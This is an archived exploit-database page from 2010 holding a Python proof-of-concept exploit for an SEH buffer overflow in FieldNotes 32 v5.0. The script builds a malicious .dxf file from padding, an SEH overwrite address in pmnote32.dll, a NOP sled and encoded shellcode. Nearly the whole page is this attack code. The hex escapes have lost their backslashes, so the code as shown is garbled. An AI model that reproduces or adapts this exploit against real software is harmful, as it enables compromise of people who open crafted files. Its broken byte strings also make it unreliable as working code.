FieldNotes 32 v5.0 Buffer Overflow (SEH)
Posted on 25 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>FieldNotes 32 v5.0 Buffer Overflow (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================== FieldNotes 32 v5.0 Buffer Overflow (SEH) ======================================== #!/usr/bin/python # Title: FieldNotes 32 v5.0 (SEH) 0day # Date: 25/06/2010 # Author: TecR0c - http://tecninja.net/blog aka Rocco Calvi # Found by: TecR0c - http://twitter.com/TecR0c # Advisory: http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 # Platform: Windows XP sp3 En # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # This software is known to be used by Power Authorises # Usage: Launch Application > Open > Navigate to Map > Double click > BOOM print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] FieldNotes SEH (.dxf) - by TecR0c" msg = ( # TITLE=Corelan TEXT="TecR0c pwned you" "x89xe0xdaxd3xd9x70xf4x58x50x59x49x49x49x49" "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" "x42x75x4ax49x4bx69x4ax4bx4fx6bx4bx69x50x74" "x44x64x48x74x44x71x49x42x4ex52x51x6ax46x51" "x49x59x43x54x4ex6bx42x51x50x30x4ex6bx51x66" "x46x6cx4cx4bx43x46x45x4cx4cx4bx42x66x45x58" "x4ex6bx43x4ex51x30x4ex6bx46x56x44x78x42x6f" "x42x38x44x35x49x63x42x79x47x71x4ex31x49x6f" "x48x61x45x30x4cx4bx50x6cx46x44x44x64x4cx4b" "x47x35x45x6cx4ex6bx51x44x43x35x42x58x45x51" "x48x6ax4ex6bx51x5ax47x68x4ex6bx42x7ax47x50" "x47x71x48x6bx48x63x46x57x47x39x4ex6bx45x64" "x4ex6bx43x31x48x6ex50x31x4bx4fx50x31x49x50" "x4bx4cx4cx6cx4dx54x4fx30x43x44x46x6ax49x51" "x48x4fx46x6dx46x61x48x47x4ax49x4ax51x49x6f" "x4bx4fx4bx4fx45x6bx43x4cx46x44x46x48x42x55" "x49x4ex4cx4bx42x7ax51x34x43x31x48x6bx50x66" "x4ex6bx46x6cx50x4bx4ex6bx50x5ax47x6cx46x61" "x4ax4bx4cx4bx43x34x4ex6bx45x51x4ax48x4bx39" "x51x54x45x74x47x6cx43x51x4ax63x48x32x44x48" "x44x69x4ex34x4ex69x4dx35x4cx49x48x42x45x38" "x4cx4ex42x6ex44x4ex4ax4cx42x72x49x78x4fx6c" "x49x6fx49x6fx4bx4fx4dx59x51x55x45x54x4fx4b" "x43x4ex4ex38x4dx32x43x43x4bx37x45x4cx46x44" "x42x72x48x68x4cx4bx4bx4fx4bx4fx4bx4fx4dx59" "x42x65x43x38x50x68x42x4cx42x4cx51x30x49x6f" "x43x58x46x53x47x42x46x4ex50x64x45x38x51x65" "x44x33x51x75x50x72x4ex68x43x6cx51x34x45x5a" "x4dx59x48x66x51x46x4bx4fx50x55x46x64x4ex69" "x4bx72x42x70x4fx4bx49x38x4dx72x42x6dx4dx6c" "x4cx47x45x4cx51x34x43x62x48x68x51x4ex49x6f" "x49x6fx49x6fx51x78x42x4cx50x61x50x6ex51x48" "x42x48x51x53x42x4fx50x72x43x55x50x31x4bx6b" "x4bx38x51x4cx44x64x47x77x4ex69x4ax43x42x48" "x46x38x47x50x45x70x45x70x50x68x47x50x50x79" "x50x6fx51x65x50x68x43x47x42x4ex42x45x42x44" "x45x38x50x30x43x53x47x50x42x50x43x58x46x34" "x51x75x51x73x50x52x50x31x4bx79x4cx48x42x6c" "x45x74x42x30x4fx79x4dx31x50x31x4ax72x51x42" "x42x73x46x31x50x52x49x6fx4ax70x44x71x4fx30" "x42x70x4bx4fx46x35x43x38x47x7ax41x41" ) structure = "x59x6Fx75x20x77x69x6Cx6Cx20x64x69x65" structure += ' ' structure += "x53x45x43x54x49x4Fx4E" structure += ' ' structure += "x20x20x20x32" structure += ' ' structure += "x48x45x41x44x45x52" structure += ' ' structure += "x20x20x20x39" structure += ' ' structure += "x24x48x41x4Ex44x4Cx49x4Ex47" structure += ' ' structure += "x20x20x20x37x30" structure += ' ' structure += "x31" structure += " " structure += "x20x20x20x39" structure += ' ' structure += "x48x41x4Ex44x53x45x45x44" structure += ' ' structure += "x20x20x20x35" structure += ' ' structure += "x20x20x20x20x31x38x30x30" structure += ' ' structure += "x20x20x20x39" structure += ' ' structure += "x24x45x58x54x4Dx49x4E" structure += ' ' structure += "x20x20x20x31x30" structure += ' ' buff = "x44" * 500 buff += "x2dxd9x6ex01" # 0x016ED92D [pmnote32.dll] buff += "x42" * 4 buff += "x90" * 50 buff += msg buff += "x90" * 100 tecfile = open('TecR0c.dxf','w'); tecfile.write(structure + buff) tecfile.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
